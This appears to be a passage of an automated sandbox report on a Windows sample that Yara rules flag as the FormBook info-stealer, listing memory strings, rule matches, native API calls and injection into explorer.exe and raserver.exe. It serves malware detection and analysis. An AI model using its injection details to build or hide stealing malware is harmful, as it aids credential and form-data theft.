          Source: explorer.exe, 00000004.00000000.237000933.000000000F540000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/27586/searchbtn.png)
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/BG_2.png)
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/Left.png)
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/Right.png)
          Source: lpdKSOB78u.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: lpdKSOB78u.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://rdfs.org/sioc/ns#
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://rdfs.org/sioc/types#
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_004181AA NtCreateFile,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0041825A NtReadFile,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_004182DA NtClose,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009DB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009DA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009DAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9560 NtWriteFile,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009DA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009DA770 NtOpenThread,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_004182E0 NtClose,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_004181AA NtCreateFile,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_0041825A NtReadFile,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_004182DA NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B096D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B098A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B098F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B0B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B095F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B099D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B0AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09560 NtWriteFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B0A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B097A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B0A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B0A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B09760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B081B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B082E0 NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B08260 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B08390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B081AA NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B082DA NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B0825A NtReadFile,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_00407272
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_00406A9B
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_70481A98
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00408C50
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00408C0A
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0041BC2E
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0041B544
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00402D87
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0041C722
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009AB090
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A51002
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099F900
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B4120
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CEBB0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00990D20
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A61D55
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B6E30
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_00401030
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ADB090
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AD841F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B81002
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ADD5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AC0D20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AE4120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACF900
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B91D55
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AE6E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFEBB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B0BC2A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00AF8C0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00AF8C50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00AF2D87
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00AF2D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00AF2FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B0C722
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\h1luljvls0ea.dll 41B9F5241987338FAA262090BEAB1ADF4A9821497011BBE87D3A770F2C926666
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04ACB150 appears 32 times
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: String function: 0041A090 appears 40 times
          Source: lpdKSOB78u.exe, 00000000.00000003.204440401.0000000002D0F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs lpdKSOB78u.exe
          Source: lpdKSOB78u.exe, 00000000.00000002.211643992.0000000000C30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs lpdKSOB78u.exe
          Source: lpdKSOB78u.exe, 00000001.00000002.265933060.0000000000969000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameraserver.exej% vs lpdKSOB78u.exe
          Source: lpdKSOB78u.exe, 00000001.00000002.266056817.0000000000A8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs lpdKSOB78u.exe
          Source: lpdKSOB78u.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
